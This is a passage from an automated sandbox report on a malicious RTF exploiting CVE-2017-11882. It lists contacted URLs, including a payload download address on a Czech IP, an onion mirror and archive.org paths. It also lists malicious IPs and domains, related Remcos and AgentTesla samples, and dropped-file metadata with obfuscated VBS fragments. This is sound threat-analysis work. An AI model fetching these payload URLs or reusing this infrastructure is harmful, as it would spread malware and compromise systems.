                  • Avira URL Cloud: safe
                  unknown
                  https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://deff.nelreports.net/api/report?cat=msnbhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://cache.btrll.com/default/Pix-1x1.gifbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.google.comRegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIF)EQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://geoplugin.net/json.gp/Cpowershell.exe, 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIFceEQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://o.aolcdn.com/ads/adswrappermsni.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://www.msn.com/?ocid=iehpbhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://static.chartbeat.com/js/chartbeat.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://www.msn.com/de-de/?ocid=iehpbhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://login.yahoo.com/config/loginRegAsm.exefalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.nirsoft.net0RegAsm.exe, 0000000B.00000002.380657934.0000000000374000.00000004.00000010.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.nirsoft.net/RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.entrust.net0Dpowershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.369133356.0000000002461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.364796787.0000000002461000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.ccleaner.com/go/app_cc_pro_trialkeybhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.entrust.net/server1.crl0powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://archive.org/download/new_image_vbs/new_imaLRpowershell.exe, 00000005.00000002.369133356.00000000025B1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contextual.media.net/8/nrrV73987.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.378441374.00000000008C9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contextual.media.net/bhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://archive.orgpowershell.exe, 00000007.00000002.364796787.000000000259A000.00000004.00000800.00020000.00000000.sdmptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.msn.com/bhv5928.tmp.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIFjEQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://archive6zg5vrdwm4ljllgxleekeoj43lqayscd4d4kmhnyblq4h3ead.onion/download/new_image_vbs/new_impowershell.exe, 00000007.00000002.364796787.00000000026B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.364796787.000000000269E000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://85.239.241.184powershell.exe, 00000007.00000002.364796787.00000000026DA000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://cdn.at.atwola.com/_media/uac/msn.htmlbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://go.microsoft.cpowershell.exe, 00000007.00000002.364637845.00000000002FA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.google.com/accounts/serviceloginRegAsm.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://secure.comodo.com/CPS0powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://policies.yahoo.com/w3c/p3p.xmlbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.entrust.net/2048ca.crl0powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.msn.com/advertisement.ad.jsbhv5928.tmp.11.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  207.241.224.2
                  archive.orgUnited States
                  7941INTERNET-ARCHIVEUStrue
                  45.89.247.65
                  dremom2.duckdns.orgUnited Kingdom
                  33657CMCSUStrue
                  178.237.33.50
                  geoplugin.netNetherlands
                  8455ATOM86-ASATOM86NLfalse
                  85.239.241.184
                  unknownCzech Republic
                  15685CASABLANCA-ASInternetCollocationProviderCZtrue
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1505518
                  Start date and time:2024-09-06 11:25:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf
                  Detection:MAL
                  Classification:mal100.phis.troj.spyw.expl.evad.winRTF@19/18@5/4
                  EGA Information:
                  • Successful, ratio: 71.4%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 168
                  • Number of non-executed functions: 328
                  Cookbook Comments:
                  • Found application associated with file extension: .rtf
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Override analysis time to 79674.7731553256 for current running targets taking high CPU consumption
                  • Override analysis time to 159349.546310651 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                  • Execution Graph export aborted for target EQNEDT32.EXE, PID 3616 because there are no executed function
                  • Execution Graph export aborted for target powershell.exe, PID 3800 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  TimeTypeDescription
                  05:25:55API Interceptor283x Sleep call for process: EQNEDT32.EXE modified
                  05:25:57API Interceptor10x Sleep call for process: wscript.exe modified
                  05:25:58API Interceptor76x Sleep call for process: powershell.exe modified
                  05:26:04API Interceptor6203199x Sleep call for process: RegAsm.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  207.241.224.2avocFyG.vbsGet hashmaliciousAsyncRATBrowse
                  • archive.org/download/image_20211023_0112/image.mp3
                  45.89.247.65INV4092401.docx.docGet hashmaliciousRemcosBrowse
                    PLATI CU OP 2024.docx.docGet hashmaliciousRemcosBrowse
                      srr.exeGet hashmaliciousRemcosBrowse
                        SKM_22724071511020.docx.docGet hashmaliciousRemcosBrowse
                          178.237.33.50INV4092401.docx.docGet hashmaliciousRemcosBrowse
                          • geoplugin.net/json.gp
                          PO#38595.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                          • geoplugin.net/json.gp
                          QUOTATION.vbsGet hashmaliciousGuLoader, RemcosBrowse
                          • geoplugin.net/json.gp
                          SecuriteInfo.com.Win32.RATX-gen.15616.18273.exeGet hashmaliciousRemcosBrowse
                          • geoplugin.net/json.gp
                          ad7268943386108805516_48334621196_24110768413395_847727572987992881.pdf.vbsGet hashmaliciousRemcosBrowse
                          • geoplugin.net/json.gp
                          SecuriteInfo.com.Win32.MalwareX-gen.634.29708.exeGet hashmaliciousRemcosBrowse
                          • geoplugin.net/json.gp
                          SecuriteInfo.com.Win32.RATX-gen.7479.21659.exeGet hashmaliciousRemcosBrowse
                          • geoplugin.net/json.gp
                          zBJC.exeGet hashmaliciousRemcosBrowse
                          • geoplugin.net/json.gp
                          SecuriteInfo.com.Trojan.PackedNET.3042.3323.24927.exeGet hashmaliciousRemcosBrowse
                          • geoplugin.net/json.gp
                          SecuriteInfo.com.Trojan.PackedNET.3042.4675.2937.exeGet hashmaliciousRemcosBrowse
                          • geoplugin.net/json.gp
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          dremom2.duckdns.orgINV4092401.docx.docGet hashmaliciousRemcosBrowse
                          • 45.89.247.65
                          archive.orgINV4092401.docx.docGet hashmaliciousRemcosBrowse
                          • 207.241.232.154
                          comprobante.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • 207.241.232.154
                          PO_00978876.vbsGet hashmaliciousUnknownBrowse
                          • 207.241.232.154
                          INQUIRY#46789_SEPT24_Hafele_Trading_Shenzhen.jsGet hashmaliciousFormBookBrowse
                          • 207.241.227.86
                          Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 207.241.232.154
                          comprobante_swift0000099.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • 207.241.232.154
                          Inv_ 67382.vbsGet hashmaliciousUnknownBrowse
                          • 207.241.232.154
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.18888.15372.rtfGet hashmaliciousRemcosBrowse
                          • 207.241.232.154
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.30284.2728.rtfGet hashmaliciousUnknownBrowse
                          • 207.241.232.154
                          Revised SOA-INV023010924.xla.xlsxGet hashmaliciousRemcosBrowse
                          • 207.241.232.154
                          geoplugin.netINV4092401.docx.docGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          PO#38595.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                          • 178.237.33.50
                          QUOTATION.vbsGet hashmaliciousGuLoader, RemcosBrowse
                          • 178.237.33.50
                          SecuriteInfo.com.Win32.RATX-gen.15616.18273.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          ad7268943386108805516_48334621196_24110768413395_847727572987992881.pdf.vbsGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          SecuriteInfo.com.Win32.MalwareX-gen.634.29708.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          SecuriteInfo.com.Win32.RATX-gen.7479.21659.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          zBJC.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          SecuriteInfo.com.Trojan.PackedNET.3042.3323.24927.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          SecuriteInfo.com.Trojan.PackedNET.3042.4675.2937.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CASABLANCA-ASInternetCollocationProviderCZFakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                          • 109.123.227.60
                          FakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                          • 109.123.227.60
                          mirai.x86.elfGet hashmaliciousMiraiBrowse
                          • 109.123.230.89
                          205.185.120.123-skid.ppc-2024-07-27T10_33_45.elfGet hashmaliciousMirai, MoobotBrowse
                          • 77.78.79.177
                          LisectAVT_2403002A_201.exeGet hashmaliciousAmadeyBrowse
                          • 77.78.111.117
                          LisectAVT_2403002B_136.dllGet hashmaliciousEmotetBrowse
                          • 81.0.236.90
                          Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                          • 109.123.254.43
                          appdrivesound.exeGet hashmaliciousSystemBCBrowse
                          • 77.78.119.119
                          5CxmQXL0LD.exeGet hashmaliciousSystemBCBrowse
                          • 77.78.105.168
                          5qzcgIPqiG.elfGet hashmaliciousMiraiBrowse
                          • 77.78.79.183
                          INTERNET-ARCHIVEUSINV4092401.docx.docGet hashmaliciousRemcosBrowse
                          • 207.241.232.154
                          comprobante.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • 207.241.232.154
                          PO_00978876.vbsGet hashmaliciousUnknownBrowse
                          • 207.241.232.154
                          INQUIRY#46789_SEPT24_Hafele_Trading_Shenzhen.jsGet hashmaliciousFormBookBrowse
                          • 207.241.227.86
                          Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 207.241.232.154
                          comprobante_swift0000099.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • 207.241.232.154
                          Inv_ 67382.vbsGet hashmaliciousUnknownBrowse
                          • 207.241.232.154
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.18888.15372.rtfGet hashmaliciousRemcosBrowse
                          • 207.241.232.154
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.30284.2728.rtfGet hashmaliciousUnknownBrowse
                          • 207.241.232.154
                          Revised SOA-INV023010924.xla.xlsxGet hashmaliciousRemcosBrowse
                          • 207.241.232.154
                          CMCSUSINV4092401.docx.docGet hashmaliciousRemcosBrowse
                          • 45.89.247.65
                          Document#.exeGet hashmaliciousRemcosBrowse
                          • 45.89.247.84
                          t7A1BhMgJ2.exeGet hashmaliciousRemcosBrowse
                          • 45.89.247.135
                          Swift Payment.xlsGet hashmaliciousFormBookBrowse
                          • 45.89.247.151
                          aS4XS9m23e.exeGet hashmaliciousRedLineBrowse
                          • 85.209.133.187
                          PO-014842-2.xlsGet hashmaliciousFormBookBrowse
                          • 45.89.247.151
                          August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                          • 45.90.89.98
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                          • 45.90.89.98
                          file.exeGet hashmaliciousRHADAMANTHYS, XWormBrowse
                          • 85.209.133.150
                          ATOM86-ASATOM86NLINV4092401.docx.docGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          PO#38595.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                          • 178.237.33.50
                          QUOTATION.vbsGet hashmaliciousGuLoader, RemcosBrowse
                          • 178.237.33.50
                          SecuriteInfo.com.Win32.RATX-gen.15616.18273.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          ad7268943386108805516_48334621196_24110768413395_847727572987992881.pdf.vbsGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          SecuriteInfo.com.Win32.MalwareX-gen.634.29708.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          SecuriteInfo.com.Win32.RATX-gen.7479.21659.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          zBJC.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          SecuriteInfo.com.Trojan.PackedNET.3042.3323.24927.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          SecuriteInfo.com.Trojan.PackedNET.3042.4675.2937.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          05af1f5ca1b87cc9cc9b25185115607dINV4092401.docx.docGet hashmaliciousRemcosBrowse
                          • 207.241.224.2
                          comprobante.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • 207.241.224.2
                          Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 207.241.224.2
                          Purchase Order.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 207.241.224.2
                          comprobante_swift0000099.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • 207.241.224.2
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.18888.15372.rtfGet hashmaliciousRemcosBrowse
                          • 207.241.224.2
                          RFQ.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 207.241.224.2
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.30284.2728.rtfGet hashmaliciousUnknownBrowse
                          • 207.241.224.2
                          Revised SOA-INV023010924.xla.xlsxGet hashmaliciousRemcosBrowse
                          • 207.241.224.2
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfGet hashmaliciousSmokeLoaderBrowse
                          • 207.241.224.2
                          No context
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4760
                          Entropy (8bit):4.834060479684549
                          Encrypted:false
                          SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                          MD5:838C1F472806CF4BA2A9EC49C27C2847
                          SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                          SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                          SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                          Malicious:false
                          Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):0.34726597513537405
                          Encrypted:false
                          SSDEEP:3:Nlll:Nll
                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                          Malicious:false
                          Preview:@...e...........................................................
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):195600
                          Entropy (8bit):3.8644523012696523
                          Encrypted:false
                          SSDEEP:3072:LBbdxVpFzbQKUxc63rKxN+vHYnL33gt5pIGwf5pyb0la1T0H7s9LqkzsX0T:VbjVpFzbQKmbGKvHW3aWElsI
                          MD5:99B11BAD85FE65119B8ABDA67E671E46
                          SHA1:3C41D084CA96CB9EEE5F2813C4C7AFEC43733B40
                          SHA-256:6F1DE9C391202040823D62D2CE5FFB5BEA5D629E75F923F4796D1452E6E392D2
                          SHA-512:DF1B8F41A1CFC21E6008652ED1BF740CA25ADA553DDB2332FA4A7E7CA268F6696581FAB7127E9C89AD641792AE79D88B5291093DD9FAB87D17F5FCF73F07B189
                          Malicious:false
                          Preview:......W.U.Z.W.u.Q.P.W.I.B.e.c. .=. .".m.j.l.k.Z.L.O.o.r.l.B.z.".....k.a.q.L.L.x.W.x.L.Q.L.h. .=. .".b.c.P.k.O.H.W.z.i.L.c.W.".....c.N.G.P.k.L.m.c.Q.u.J.f. .=. .".c.H.h.h.W.A.G.L.A.k.m.v.".....j.k.g.l.T.W.e.G.i.J.K.n. .=. .".e.Z.O.L.m.p.p.T.B.L.L.L.".....K.x.W.Z.B.t.H.t.o.h.z.d. .=. .".e.i.v.u.L.a.U.j.z.L.x.s.".....i.k.h.C.W.K.c.R.I.C.W.W. .=. .".f.G.W.f.q.c.z.i.i.t.G.C.".....m.u.e.h.W.P.v.u.L.T.U.a. .=. .".f.L.L.W.B.k.K.W.K.q.t.x.".........K.L.k.v.W.W.W.S.l.z.v.d. .=. .".o.b.v.a.g.u.e.a.r.B.L.e.a.f.L.L.P.".....z.k.O.L.e.a.Z.o.b.h.R.U. .=. .".l.t.P.W.L.k.m.L.A.W.m.K.".....h.P.i.z.A.p.Z.d.U.o.d.h. .=. .".W.k.U.m.j.U.o.v.a.g.u.e.a.r.h.z.S.".....s.k.N.l.e.n.K.r.e.n.Q.x. .=. .".B.e.c.e.z.i.G.x.L.A.i.m.".....d.N.A.q.o.Z.G.L.U.P.f.z. .=. .".h.W.b.Z.h.p.p.W.l.T.u.U.".....G.a.b.W.d.q.N.h.h.m.u.Z. .=. .".t.Q.Q.K.U.x.i.W.R.I.a.L.".....m.h.t.T.U.b.o.m.W.K.t.c. .=. .".W.L.r.z.I.u.R.c.L.c.I.l.".....g.f.G.W.L.h.G.e.m.k.m.K. .=. .".C.G.f.c.W.z.A.K.p.d.m.o.".....u.o.m.R.N.k.R.K.C.q.B.o. .=. .".W.C.c.c.
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):962
                          Entropy (8bit):5.013811273052389
                          Encrypted:false
                          SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                          MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                          SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                          SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                          SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                          Malicious:false
